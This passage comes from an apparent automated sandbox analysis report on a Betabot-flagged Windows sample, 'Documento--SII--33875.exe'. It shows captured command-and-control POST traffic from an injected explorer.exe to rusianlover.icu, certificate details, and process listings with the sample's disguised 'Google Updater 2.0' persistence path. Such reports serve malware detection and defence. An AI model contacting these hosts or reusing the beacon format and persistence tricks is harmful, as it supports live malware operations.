31 38 35 35 45 36 45 44 41 33 37 43 34 34 36 41 34 37 45 37 34 30 45 41 46 33 41 45 32 46 33 43 30 43 42 32 38 31 30 33 32 42 43 41 30 30 45 30 45 37 39 32 45 35 46 45 33 31 33 46 31 39 32 45 37 34 36 39 39 30 37 39 41 36 46 35 43 43 45 32 44 43 46 33 43 31 34 46 45 38 43 34 44 35 31 30
                                        Data Ascii: lcnepgxiz=5607521&ngtmz=7a91b1e40e05e740&pkzujez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
                                        Mar 10, 2021 11:42:36.624667883 CET | 1939 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:42:42 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a c9 b4 e9 0d a6 61 f5 53 a9 97 3c 8a d4 2e 04 dc fc 45 a4 e2 81 76 15 22 a5 7a f5 49 66 f8 91 7b 48 aa 4b 93 41 a3 6f f1 7e b7 80 d3 fc c3 a6 95 f8 73 bc 0c 00 51 23 ce a0 25 3b 37 a1 9d cc b5 63 e1 ea 1f 05 93 99 d0 2f 73 85 10 e1 58 ff 24 a3 1f ba 06 06 ea f3 a6 ed ee 89 9f b5 11 74 c0 21 ca 07 29 42 a9 f0 23 81 01 83 0f 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6daS<.Ev"zIf{HKAo~sQ#%;7c/sX$t!)B#0


                                        Session ID: 5 | Source: 192.168.2.5:49722 | Destination: 212.114.52.43:80 | Process: C:\Windows\SysWOW64\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Mar 10, 2021 11:42:39.489584923 CET | 1963 | OUT | POST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 693
                                        Cache-Control: no-cache
                                        Data Raw: 6d 79 6b 77 6f 61 3d 64 62 37 62 63 32 62 38 65 62 31 64 39 64 35 64 39 33 39 64 65 62 65 35 33 34 35 31 37 64 34 61 65 36 34 38 36 63 37 66 34 61 34 35 31 64 32 35 39 30 34 35 63 32 39 38 34 34 32 31 36 32 61 61 38 33 61 37 66 36 30 63 34 65 32 64 34 65 26 6b 75 65 6f 3d 36 30 38 34 37 33 36 32 26 6f 63 71 65 79 6d 61 6f 3d 30 34 61 64 35 64 32 62 38 64 66 34 38 64 39 33 65 39 38 63 64 64 38 32 63 65 33 35 38 34 64 62 30 65 61 61 64 38 38 39 63 65 66 34 61 62 33 31 37 39 36 32 32 36 32 37 38 34 32 63 62 31 31 65 35 37 32 65 33 63 30 66 30 37 63 38 39 65 30 36 62 63 64 31 35 30 63 34 32 35 61 65 64 39 61 39 64 35 63 36 32 62 32 35 36 65 39 37 34 30 32 33 34 62 38 30 64 61 35 30 32 61 31 65 34 36 65 30 64 65 34 63 35 64 34 30 63 32 36 31 39 38 35 32 35 35 64 39 33 39 39 65 62 66 35 39 36 38 63 63 35 34 64 39 62 30 35 37 35 65 35 36 66 39 30 62 37 65 35 35 31 33 39 62 32 30 62 66 64 64 33 61 63 62 64 64 36 61 34 36 39 31 32 36 30 33 37 36 63 31 64 62 34 65 30 39 35 34 35 65 39 33 33 39 62 35 37 39 39 37 32 39 65 66 66 37 39 35 64 34 65 61 63 36 33 61 38 33 35 38 39 32 66 63 37 39 37 33 39 34 34 61 64 30 32 35 61 33 31 37 39 39 36 63 30 34 32 34 65 66 63 64 39 36 65 30 62 61 37 31 65 39 35 34 37 66 65 64 32 35 34 64 38 33 66 38 30 34 30 63 63 36 35 39 33 31 35 35 30 30 61 63 35 61 30 36 36 61 35 35 30 63 64 36 64 33 30 30 30 34 30 39 62 38 36 31 63 64 39 37 64 36 62 30 65 63 65 37 32 35 33 39 37 66 33 30 38 61 34 31 32 39 36 33 36 33 66 36 39 39 65 30 63 34 39 63 61 32 33 65 31 34 62 39 38 35 31 65 30 66 64 37 36 35 33 36 31 35 34 61 64 66 32 35 63 63 39 66 63 31 31 31 30 61 33 63 34 37 35 37 66 34 64 37 30 32 30 38 33 30 31 34 66 61 39 30 62 35 35 63 65 39 61 33 38 39 62 38 64 63 62 65 37 36 33 33 62 37 31 37 61 31 64 35 64 66 32 61 31 39 31 38 31 36 64 39 39 66 31 38 30 63 61 34 66 62 64 64 66 33 35 38 62 31 30 66 39 36 34 37 63 37 37 63 62 65 38 33 31 30 62 64 34 61 30 32 65 31 39 30 63 32 35 62 36 64 36 62 61 66 38 
30 38 36 63 66 32 34 65 66 39 66 39 36 66 34 35 31 39 32 66 36 65 63 35 30 31 31 32 34 38 35 30 33 64 38 61 32 61 32 61 30 35 30
                                        Data Ascii: mykwoa=db7bc2b8eb1d9d5d939debe534517d4ae6486c7f4a451d259045c298442162aa83a7f60c4e2d4e&kueo=60847362&ocqeymao=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
                                        Mar 10, 2021 11:42:39.561311007 CET | 1963 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:42:45 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a cc 5d 85 0b 05 18 23 2f ea e7 63 88 53 b8 05 b7 80 ef 94 08 27 65 61 4e ca f6 85 54 9d 1c 57 86 c6 89 0a 00 b8 d0 4d 35 26 e1 bc 33 d1 39 11 72 3d 57 4b 61 16 ed aa c6 1f 9d da 11 d7 16 70 52 82 9a c5 be a6 2c 08 ea 71 38 bb fe 50 37 32 32 bc 86 6d f1 cd 83 0a 1a 60 37 de b8 45 d3 6b f3 c3 85 18 68 db 5b 1f 7f 61 7e 8d 67 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6d]#/cS'eaNTWM5&39r=WKapR,q8P722m`7Ekh[a~g0


                                        Session ID: 6 | Source: 192.168.2.5:49724 | Destination: 212.114.52.43:80 | Process: C:\Windows\SysWOW64\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Mar 10, 2021 11:42:42.321046114 CET | 1979 | OUT | POST /forum/logout.php?id=1809723 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 664
                                        Cache-Control: no-cache
                                        Data Raw: 78 75 72 6f 6c 3d 32 31 36 30 36 31 32 37 26 7a 79 78 77 76 75 74 3d 37 30 42 34 32 32 31 39 31 43 31 38 45 43 42 32 46 37 43 38 38 45 30 43 34 44 46 36 42 30 43 42 39 45 35 37 38 34 30 41 35 36 32 45 34 43 26 62 63 64 65 66 67 68 69 6a 3d 41 35 45 38 34 38 44 38 42 41 45 43 46 37 34 32 36 37 36 45 35 34 44 35 44 36 39 37 46 41 36 43 46 34 37 42 41 37 42 31 38 41 38 35 43 45 35 37 32 32 45 42 43 32 41 31 35 41 31 45 36 43 30 45 44 31 39 39 37 33 46 39 30 39 37 38 39 44 32 31 36 32 35 35 43 45 33 42 30 30 42 46 41 43 33 43 45 46 46 36 35 30 46 39 44 34 38 42 45 46 43 36 30 42 43 45 44 33 35 35 34 44 32 36 39 43 42 46 31 41 33 36 36 32 36 33 34 30 37 42 44 34 41 31 31 41 42 35 31 37 30 33 43 45 42 46 35 31 42 46 42 46 45 36 37 42 42 42 42 36 46 39 31 38 44 42 39 46 45 31 44 39 34 35 39 35 31 42 35 44 45 35 32 39 33 46 38 31 36 37 32 36 41 31 42 32 36 39 46 31 43 38 41 44 30 41 43 41 42 35 34 34 43 45 44 34 35 36 43 31 41 37 36 42 34 46 31 46 44 39 46 38 46 43 44 31 41 45 45 38 41 38 36 34 43 37 36 36 31 36 30 42 37 43 43 46 39 30 44 38 41 33 32 36 38 30 31 39 39 31 42 44 33 46 30 38 46 30 34 37 31 32 41 31 43 30 46 33 37 33 34 33 34 32 42 32 43 36 31 37 44 35 37 33 41 44 41 31 35 42 46 31 42 34 30 45 45 38 45 38 30 44 32 42 34 41 32 44 41 38 39 38 46 41 42 36 35 41 44 43 39 41 41 36 38 41 39 34 41 39 32 31 33 41 32 46 43 45 36 35 46 36 39 37 37 45 42 33 38 41 41 45 41 34 30 30 45 36 34 36 30 35 38 41 39 44 39 37 39 34 30 45 34 32 46 39 43 30 32 44 35 45 30 38 33 35 44 46 46 46 37 34 38 38 39 42 34 37 36 43 43 34 36 45 34 45 33 36 31 38 45 37 30 38 37 45 38 35 44 44 39 39 44 33 36 31 46 39 45 34 39 34 42 46 30 38 42 31 39 42 38 36 32 42 42 46 45 41 43 42 45 45 45 37 41 38 45 36 41 43 36 30 34 39 30 35 31 39 45 34 33 30 31 38 30 31 33 31 30 43 42 33 31 33 43 32 36 42 36 46 33 36 46 38 31 37 44 35 34 30 46 41 32 35 36 34 37 35 31 46 30 45 33 44 46 43 32 46 35 39 45 44 31 38 35 37 43 45 46 38 45 32 44 32 44 42 36 46 43 39 
44 41 46 43 36 46 31 32 31 35 31 42 30 36
                                        Data Ascii: xurol=21606127&zyxwvut=70B422191C18ECB2F7C88E0C4DF6B0CB9E57840A562E4C&bcdefghij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
                                        Mar 10, 2021 11:42:42.394654989 CET | 1984 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:42:48 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 65 e2 3a 18 f0 0c 2d 1a 4c a9 a2 55 9f de 29 49 0b 7f 41 0f 23 8a 00 53 ce cd e5 ad 8e e3 f9 6b 97 04 22 ed 8f 19 69 97 66 5d 5f 2f ff 52 fc f7 aa bb 38 c0 af f9 3d d2 1a de 86 a8 37 eb d3 4c 2a 89 a3 94 97 26 bd 2e bd 35 5f 09 6c 7a 93 4d 81 8a 3e 54 da bb 94 e0 a6 f1 3b 8d c4 9d 12 1d 13 23 53 b0 92 fb 08 39 d0 9e 4d 9a 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6de:-LU)IA#Sk"if]_/R8=7L*&.5_lzM>T;#S9M0


                                        Session ID: 7 | Source: 192.168.2.5:49726 | Destination: 212.114.52.43:80 | Process: C:\Windows\SysWOW64\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Mar 10, 2021 11:42:45.201111078 CET | 2030 | OUT | POST /forum/logout.php?page=83 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 644
                                        Cache-Control: no-cache
                                        Data Raw: 76 77 78 79 74 75 76 77 72 3d 36 39 31 36 36 35 37 31 26 78 61 64 67 64 3d 36 64 36 37 64 32 36 36 33 37 34 35 61 32 63 63 32 37 32 64 31 35 65 65 31 38 26 7a 65 6a 6f 6e 73 78 3d 32 46 31 30 30 35 38 32 35 39 34 32 34 42 32 34 39 39 35 33 42 39 32 41 32 45 38 31 32 33 34 41 43 33 45 33 41 35 33 35 42 37 32 42 39 44 46 43 39 32 39 45 42 44 38 33 43 45 46 38 36 44 34 39 32 31 38 36 45 45 41 44 41 41 34 36 33 43 31 46 31 37 36 32 37 46 39 32 34 35 37 42 31 42 43 34 34 46 42 45 33 44 30 30 43 33 41 41 30 30 42 31 46 42 44 41 39 35 44 46 34 31 35 39 38 41 46 32 33 39 38 46 42 43 37 45 42 32 36 33 42 33 39 43 32 39 34 38 37 43 34 45 30 46 43 31 34 33 32 44 34 34 44 45 45 43 37 34 30 43 36 39 32 33 46 46 36 45 41 44 33 44 34 30 44 39 31 44 43 35 38 43 36 38 44 31 36 42 42 43 36 46 32 36 36 42 37 39 43 43 43 32 35 31 45 37 43 41 35 42 30 43 39 38 33 34 34 30 43 31 31 34 32 33 30 33 32 43 46 34 33 36 42 46 38 38 37 35 32 38 37 33 30 46 46 32 31 41 42 37 45 39 32 38 43 43 42 34 38 44 46 45 32 46 41 33 45 42 36 34 34 33 37 34 36 30 38 32 45 35 39 35 31 33 42 32 34 43 42 43 33 30 43 32 41 32 46 33 30 31 44 36 46 31 32 32 44 41 32 41 30 39 41 38 34 35 33 36 30 30 36 36 42 33 41 39 32 34 32 34 42 33 34 33 39 34 36 46 44 38 46 44 42 36 46 35 37 30 31 35 44 31 42 32 35 38 46 43 41 44 39 37 36 33 42 46 36 34 39 38 33 35 35 33 32 34 35 45 36 31 35 41 43 31 32 33 38 38 31 30 30 44 46 43 45 39 33 38 44 34 38 31 32 46 42 31 45 34 39 42 31 36 46 43 34 44 43 34 41 41 46 43 46 34 34 37 46 39 43 42 35 38 36 30 42 42 41 46 43 38 35 42 32 32 41 32 43 30 32 36 43 31 31 41 38 30 36 34 43 32 42 32 32 32 38 45 30 34 34 45 36 37 41 31 30 39 45 31 41 37 30 37 39 39 35 45 36 38 38 36 41 44 38 39 36 31 38 43 39 34 36 32 30 42 39 39 35 34 30 43 43 34 31 41 32 37 44 42 41 45 32 30 44 42 43 38 33 34 37 36 34 36 36 42 45 30 42 32 44 32 46 30 31 39 34 33 30 46 34 31 46 42 31 45 41 36 46 33 33 35 43 38 46 32 39 30 44 37 45 43 39 36 39 45
                                        Data Ascii: vwxytuvwr=69166571&xadgd=6d67d2663745a2cc272d15ee18&zejonsx=2F10058259424B249953B92A2E81234AC3E3A535B72B9DFC929EBD83CEF86D492186EEADAA463C1F17627F92457B1BC44FBE3D00C3AA00B1FBDA95DF41598AF2398FBC7EB263B39C29487C4E0FC1432D44DEEC740C6923FF6EAD3D40D91DC58C68D16BBC6F266B79CCC251E7CA5B0C983440C11423032CF436BF887528730FF21AB7E928CCB48DFE2FA3EB6443746082E59513B24CBC30C2A2F301D6F122DA2A09A845360066B3A92424B343946FD8FDB6F57015D1B258FCAD9763BF64983553245E615AC12388100DFCE938D4812FB1E49B16FC4DC4AAFCF447F9CB5860BBAFC85B22A2C026C11A8064C2B2228E044E67A109E1A707995E6886AD89618C94620B99540CC41A27DBAE20DBC83476466BE0B2D2F019430F41FB1EA6F335C8F290D7EC969E
                                        Timestamp:Mar 10, 2021 11:42:45.268615007 CET
                                        kBytes transferred:2031
                                        Direction:IN
                                        Data:HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:42:51 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Ascii: 6dP_tWXSF"M?I4 l8$p)1nKP`RLvr`r>x?zW;0X6D,Wu0


                                        Session ID:8
                                        Source IP:192.168.2.5
                                        Source Port:49727
                                        Destination IP:212.114.52.43
                                        Destination Port:80
                                        Process:C:\Windows\SysWOW64\explorer.exe
                                        Timestamp:Mar 10, 2021 11:42:48.520873070 CET
                                        kBytes transferred:2033
                                        Direction:OUT
                                        Data:POST /forum/logout.php?id=2140088 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 679
                                        Cache-Control: no-cache
                                        Data Ascii: oicwqk=29435162&qmieawsi=53e965f82386fd48f80553c1e10f6d8e1577e6120d6915a2196fc1f28f2a388d&sqom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
                                        Timestamp:Mar 10, 2021 11:42:48.590410948 CET
                                        kBytes transferred:2034
                                        Direction:IN
                                        Data:HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:42:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Ascii: 6dKS|^5lutoz'2Hg-b"mQ$\-k3{~Gw-dSu1t0


                                        Session ID:9
                                        Source IP:192.168.2.5
                                        Source Port:49729
                                        Destination IP:212.114.52.43
                                        Destination Port:80
                                        Process:C:\Windows\SysWOW64\explorer.exe
                                        Timestamp:Mar 10, 2021 11:42:51.355341911 CET
                                        kBytes transferred:2038
                                        Direction:OUT
                                        Data:POST /forum/logout.php?id=9885598 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 646
                                        Cache-Control: no-cache
                                        Data Ascii: zejot=59975485&bipwdkr=CE3B647B2EA5A61C1171F02D9742&dmvenwfox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
                                        Timestamp:Mar 10, 2021 11:42:51.430608988 CET
                                        kBytes transferred:2038
                                        Direction:IN
                                        Data:HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:42:57 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Ascii: 6dv4STC`s1J)4"[f$q;evbz|G8%uT&m7>i.bCM+jP~P7B:C0


                                        Timestamp:Mar 10, 2021 11:42:29.744301081 CET
                                        Source IP:104.21.55.228
                                        Source Port:443
                                        Dest IP:192.168.2.5
                                        Dest Port:49717
                                        Subject:CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US
                                        Issuer:CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
                                        Not Before:Tue Jul 28 02:00:00 CEST 2020
                                        Not After:Wed Jul 28 14:00:00 CEST 2021
                                        JA3 SSL Client Fingerprint:771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-24-65281,29-23-24,0
                                        JA3 SSL Client Digest:57f3642b4e37e28f5cbe3020c9331b4c
                                        Issuing CA certificate in the presented chain:
                                        Subject:CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
                                        Issuer:CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
                                        Not Before:Mon Jan 27 13:48:08 CET 2020
                                        Not After:Wed Jan 01 00:59:59 CET 2025

                                        Code Manipulations

                                        Statistics

                                        Behavior


                                        System Behavior

                                        Start time:11:41:51
                                        Start date:10/03/2021
                                        Path:C:\Users\user\Desktop\Documento--SII--33875.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\Documento--SII--33875.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Start time:11:41:52
                                        Start date:10/03/2021
                                        Path:C:\Users\user\Desktop\Documento--SII--33875.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\Documento--SII--33875.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:low
                                        Start time:11:41:54
                                        Start date:10/03/2021
                                        Path:C:\Windows\SysWOW64\explorer.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                        Imagebase:0xe0000
                                        File size:3611360 bytes
                                        MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000003.00000002.519183490.0000000002A00000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:high
                                        Start time:11:41:58
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000005.00000002.551764489.0000000004650000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Start time:11:42:00
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000007.00000002.545447794.0000000003B70000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Start time:11:42:01
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x7ff797770000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000008.00000002.546008227.00000000041D0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Start time:11:42:03
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000009.00000002.539566697.0000000003B10000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Start time:11:42:04
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000A.00000002.530193704.0000000003AD0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Start time:11:42:06
                                        Start date:10/03/2021
                                        Path:C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Start time:11:42:07
                                        Start date:10/03/2021
                                        Path:C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:low
                                        Start time:11:42:10
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Start time:11:42:11
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Start time:11:42:13
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Start time:11:42:14
                                        Start date:10/03/2021
                                        Path:C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Start time:11:42:15
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Start time:11:42:15
                                        Start date:10/03/2021
                                        Path:C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:low
                                        Start time:11:42:16
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Start time:11:42:18
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
